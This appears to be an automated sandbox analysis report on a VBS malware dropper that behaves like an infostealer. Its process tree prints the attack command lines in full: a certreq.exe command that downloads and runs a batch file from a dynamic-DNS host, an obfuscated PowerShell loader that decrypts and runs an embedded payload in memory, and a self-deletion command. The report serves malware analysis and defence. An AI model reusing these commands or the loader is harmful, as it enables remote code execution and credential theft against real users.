Analysis
- max time kernel: 70s
- max time network: 130s
- platform: windows10-2004_x64
- resource: win10v2004-20220901-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 09-12-2022 02:28
Static task: static1
Behavioral task: behavioral1
  Sample: 91ef79825a38a6d9942f8963206785bc.vbs
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: 91ef79825a38a6d9942f8963206785bc.vbs
  Resource: win10v2004-20220901-en
Behavioral task: behavioral3
  Sample: f919de1034edc7b8a4a5a8aa8f0067dd.exe
  Resource: win7-20220901-en
General
- Target: 91ef79825a38a6d9942f8963206785bc.vbs
- Size: 784B
- MD5: 4304fd3c7c6532cb19e0f29773b5e253
- SHA1: 333be879c7816ebc1417fad26953fc235e2cf2ac
- SHA256: 0593fa1832103b3903a35bbfab6f0331cb9031b75afeff791cc7d331f5c2a028
- SHA512: faed7856e6f9e1933bd1730d1165c75e3dd12288fb7b5d9a3a6a2416efb5a592301aca98ce90562c59045d5f3e81b54c00d1afecc6634af85b330bd3c6ff2031
Malware Config
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes (flow | pid | process):
    13 | 3480 | powershell.exe
- Executes dropped EXE (1 IoC)
  Processes (pid | process):
    4260 | mspalt.bat.exe
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description | ioc | process):
    Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | WScript.exe
    Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | mspalt.bat.exe
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  Processes (description | ioc | process):
    Key opened | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | mspalt.bat.exe
    Key opened | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | mspalt.bat.exe
    Key opened | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | mspalt.bat.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (12 IoCs)
  Processes (pid | process):
    3480 | powershell.exe
    3480 | powershell.exe
    3380 | powershell.exe
    3380 | powershell.exe
    4260 | mspalt.bat.exe
    4260 | mspalt.bat.exe
    4260 | mspalt.bat.exe
    4260 | mspalt.bat.exe
    3720 | powershell.exe
    3720 | powershell.exe
    3720 | powershell.exe
    3720 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes (description | pid | process):
    Token: SeDebugPrivilege | 3480 | powershell.exe
    Token: SeDebugPrivilege | 3380 | powershell.exe
    Token: SeDebugPrivilege | 4260 | mspalt.bat.exe
    Token: SeDebugPrivilege | 3720 | powershell.exe
- Suspicious use of WriteProcessMemory (20 IoCs)
  Processes (description | pid | process | target process):
    PID 4296 wrote to memory of 4468 | 4296 | WScript.exe | cmd.exe
    PID 4296 wrote to memory of 4468 | 4296 | WScript.exe | cmd.exe
    PID 4468 wrote to memory of 2328 | 4468 | cmd.exe | cmd.exe
    PID 4468 wrote to memory of 2328 | 4468 | cmd.exe | cmd.exe
    PID 4468 wrote to memory of 804 | 4468 | cmd.exe | cmd.exe
    PID 4468 wrote to memory of 804 | 4468 | cmd.exe | cmd.exe
    PID 2328 wrote to memory of 452 | 2328 | cmd.exe | certreq.exe
    PID 2328 wrote to memory of 452 | 2328 | cmd.exe | certreq.exe
    PID 4468 wrote to memory of 1528 | 4468 | cmd.exe | cmd.exe
    PID 4468 wrote to memory of 1528 | 4468 | cmd.exe | cmd.exe
    PID 1528 wrote to memory of 3480 | 1528 | cmd.exe | powershell.exe
    PID 1528 wrote to memory of 3480 | 1528 | cmd.exe | powershell.exe
    PID 3480 wrote to memory of 2212 | 3480 | powershell.exe | cmd.exe
    PID 3480 wrote to memory of 2212 | 3480 | powershell.exe | cmd.exe
    PID 2212 wrote to memory of 3380 | 2212 | cmd.exe | powershell.exe
    PID 2212 wrote to memory of 3380 | 2212 | cmd.exe | powershell.exe
    PID 2212 wrote to memory of 4260 | 2212 | cmd.exe | mspalt.bat.exe
    PID 2212 wrote to memory of 4260 | 2212 | cmd.exe | mspalt.bat.exe
    PID 4260 wrote to memory of 3720 | 4260 | mspalt.bat.exe | powershell.exe
    PID 4260 wrote to memory of 3720 | 4260 | mspalt.bat.exe | powershell.exe
- outlook_office_path (1 IoC)
  Processes (description | ioc | process):
    Key opened | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | mspalt.bat.exe
- outlook_win_path (1 IoC)
  Processes (description | ioc | process):
    Key opened | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | mspalt.bat.exe
Processes (process tree; the number in brackets is the depth in the tree)
- [1] C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\91ef79825a38a6d9942f8963206785bc.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" "/c sTARt /B /mIn CeRTReQ.eXe -poSt -CONFIg http://jlhuoiljnuyjbyrtjyghiljoiuhyujhblkjlhnbyugjvytyjgbkjhnyutgyjhyb.ydns.eu/fire/derrffdde.bat c:\WindoWs\wrITE.Exe C:\Users\Admin\AppData\Roaming\MSW0RD.bat | Cmd /stART /b /mIn pING.exe & start C:\Users\Admin\AppData\Roaming\MSW0RD.bat"
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /S /D /c" sTARt /B /mIn CeRTReQ.eXe -poSt -CONFIg http://jlhuoiljnuyjbyrtjyghiljoiuhyujhblkjlhnbyugjvytyjgbkjhnyutgyjhyb.ydns.eu/fire/derrffdde.bat c:\WindoWs\wrITE.Exe C:\Users\Admin\AppData\Roaming\MSW0RD.bat "
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\certreq.exe
        Command line: CeRTReQ.eXe -poSt -CONFIg http://jlhuoiljnuyjbyrtjyghiljoiuhyujhblkjlhnbyugjvytyjgbkjhnyutgyjhyb.ydns.eu/fire/derrffdde.bat c:\WindoWs\wrITE.Exe C:\Users\Admin\AppData\Roaming\MSW0RD.bat
    - [3] C:\Windows\system32\cmd.exe
      Command line: Cmd /stART /b /mIn pING.exe
    - [3] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\MSW0RD.bat"
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: POWeRsHELl -ex ByPASS -Nop -W 1 -eC [base64-encoded command not present in the source]
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mspalt.bat" "
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -noprofile -w hidden -ep bypass -c #
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
          - [6] C:\Users\Admin\AppData\Local\Temp\mspalt.bat.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\mspalt.bat.exe" -noprofile -ep bypass -c function yR($v){$v.Replace('@', '')}$Kh=yR 'Fro@mBa@se64@St@ri@ng@';$IZ=yR 'Spl@it@';$oS=yR 'R@e@a@dAll@Te@x@t@';$hn=yR 'Entr@yPo@int@';$bU=yR 'Ch@an@g@eEx@ten@s@io@n@';$qi=yR 'I@nv@ok@e@';$qJ=yR 'Get@Cu@r@r@e@ntP@ro@ces@s@';$Xu=yR 'Tra@ns@form@Fi@nal@Bloc@k@';$BY=yR 'C@r@ea@te@D@ecr@ypt@o@r@';$nX=yR 'Loa@d@';function nAwju($EukzE,$KnLgV,$DHvkN){$mNRTM=[System.Security.Cryptography.Aes]::Create();$mNRTM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mNRTM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mNRTM.Key=[System.Convert]::$Kh($KnLgV);$mNRTM.IV=[System.Convert]::$Kh($DHvkN);$XIotA=$mNRTM.$BY();$HuHEw=$XIotA.$Xu($EukzE,0,$EukzE.Length);$XIotA.Dispose();$mNRTM.Dispose();$HuHEw;}function GmSLK($EukzE){$ttBgS=New-Object System.IO.MemoryStream(,$EukzE);$bHGBk=New-Object System.IO.MemoryStream;$IttUw=New-Object System.IO.Compression.GZipStream($ttBgS,[IO.Compression.CompressionMode]::Decompress);$IttUw.CopyTo($bHGBk);$IttUw.Dispose();$ttBgS.Dispose();$bHGBk.Dispose();$bHGBk.ToArray();}function Gvvpt($EukzE,$KnLgV){[System.Reflection.Assembly]::$nX([byte[]]$EukzE).$hn.$qi($null,$KnLgV);}$cBaPI=[System.IO.File]::$oS([System.IO.Path]::$bU([System.Diagnostics.Process]::$qJ().MainModule.FileName, $null)).$IZ([Environment]::NewLine);$erUjZ=$cBaPI[$cBaPI.Length-1].Substring(2);$CYaoK=[string[]]$erUjZ.$IZ('\');$aOqoR=GmSLK (nAwju ([Convert]::$Kh($CYaoK[0])) $CYaoK[2] $CYaoK[3]);$YQHYd=GmSLK (nAwju ([Convert]::$Kh($CYaoK[1])) $CYaoK[2] $CYaoK[3]);Gvvpt $YQHYd $null;Gvvpt $aOqoR $null;
            - Executes dropped EXE
            - Checks computer location settings
            - Accesses Microsoft Outlook profiles
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            - outlook_office_path
            - outlook_win_path
            - [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -c "$a = [System.Diagnostics.Process]::GetProcessById(4260);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;"
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: bb925cc5c32a817b61b5a68f00475ac2
  SHA1: 368bbcd93d46036334f385fe80a6315130a873f4
  SHA256: cab89442f228f263a88d3db648093b2389fa2676ee3f95fccdd7c9574a8e1c11
  SHA512: 69688f4277b0dfdeca560166776ecc74ae2933d6808e849ac60e0eb2310333d37e6216edb23737459a0e2395594a1cd579bccd008499e08526393d96315b4634
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: bae41789df209de6351654d76086f7c2
  SHA1: 14472787eac8e684154040b0223923e1d38f3d46
  SHA256: 84fab5955633e7cf846c9682bfdaf209cb5c54b1df029046a9d595b1687895d3
  SHA512: 7a164666724b2939437d1c2e3ad164928d4c9ccf6c9027621cc7a107f579f6bd685f9588063b0fe17730330c4b517b494c496b2268356e6d4a0c298c86cdcb59
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 64B
  MD5: b7955fb76a90e0f22cef807d30931389
  SHA1: b0baf94728fa95722bb79fd7e808915a34f325c6
  SHA256: b5ccfba6cd331784a1245aef10ac4f15f54c8794a3794e98e9999f235c6908a3
  SHA512: 62411c96d8870fc02cb27d8f8a117e12f6dd0205980a2948594c7a80e377e82098dd98f0a192c101f9ac5cb993b8540f5a785b2978c20218b6a1b8ad5525c936
- C:\Users\Admin\AppData\Local\Temp\mspalt.bat
  Filesize: 121KB
  MD5: c61a072f3a23cb30b7de5f2fde721aa5
  SHA1: 2cf6627b27746800cf433967723cba04437ea8c4
  SHA256: 3b76cb3ab031658b762892f0d4145498eee84da51d451c67c1ca642afd79add1
  SHA512: 91362eb4959556c7b9eeb23a407cddbb01b7842ab4e5b583fb61df7182d5e606d174f45a4a90f3791976f70aeff47595357f47a697521388cda924bb986ed3b2
- C:\Users\Admin\AppData\Local\Temp\mspalt.bat.exe
  Filesize: 442KB
  MD5: 04029e121a0cfa5991749937dd22a1d9
  SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
  SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
  SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
- C:\Users\Admin\AppData\Local\Temp\mspalt.bat.exe
  Filesize: 442KB
  MD5: 04029e121a0cfa5991749937dd22a1d9
  SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
  SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
  SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
- C:\Users\Admin\AppData\Roaming\MSW0RD.bat
  Filesize: 645B
  MD5: 834e89e3b40dc70d0066308c5aa8086b
  SHA1: 9938b28483b704b275d6239bf3696d4d68b7ddc0
  SHA256: e0821c032569fd1820f3399609b27f448db1b9d34043593661ea6000bbcdf0eb
  SHA512: c0562e96e7b8f2fc950ee4a29413c28202eaafd919b52156abc41a4f9489a4f56d797669dc7d58779b051f8bce2ac02c33aca79ba2374ccad2aa8fd643491c95
- memory/452-135-0x0000000000000000-mapping.dmp
- memory/804-134-0x0000000000000000-mapping.dmp
- memory/1528-136-0x0000000000000000-mapping.dmp
- memory/2212-141-0x0000000000000000-mapping.dmp
- memory/2328-133-0x0000000000000000-mapping.dmp
- memory/3380-147-0x00007FF98FD40000-0x00007FF990801000-memory.dmp
  Filesize: 10.8MB
- memory/3380-148-0x00007FF98FD40000-0x00007FF990801000-memory.dmp
  Filesize: 10.8MB
- memory/3380-144-0x0000000000000000-mapping.dmp
- memory/3480-139-0x00000242C7650000-0x00000242C7672000-memory.dmp
  Filesize: 136KB
- memory/3480-138-0x0000000000000000-mapping.dmp
- memory/3480-140-0x00007FF98FB50000-0x00007FF990611000-memory.dmp
  Filesize: 10.8MB
- memory/3480-143-0x00007FF98FB50000-0x00007FF990611000-memory.dmp
  Filesize: 10.8MB
- memory/3720-162-0x00007FF98FD40000-0x00007FF990801000-memory.dmp
  Filesize: 10.8MB
- memory/3720-159-0x00007FF98FD40000-0x00007FF990801000-memory.dmp
  Filesize: 10.8MB
- memory/3720-156-0x0000000000000000-mapping.dmp
- memory/4260-157-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmp
  Filesize: 2.0MB
- memory/4260-154-0x00007FF9ADC00000-0x00007FF9ADCBE000-memory.dmp
  Filesize: 760KB
- memory/4260-153-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmp
  Filesize: 2.0MB
- memory/4260-152-0x00007FF98FD40000-0x00007FF990801000-memory.dmp
  Filesize: 10.8MB
- memory/4260-158-0x00007FF9ADC00000-0x00007FF9ADCBE000-memory.dmp
  Filesize: 760KB
- memory/4260-160-0x00007FF98FD40000-0x00007FF990801000-memory.dmp
  Filesize: 10.8MB
- memory/4260-161-0x00007FF9AE8D0000-0x00007FF9AEAC5000-memory.dmp
  Filesize: 2.0MB
- memory/4260-149-0x0000000000000000-mapping.dmp
- memory/4468-132-0x0000000000000000-mapping.dmp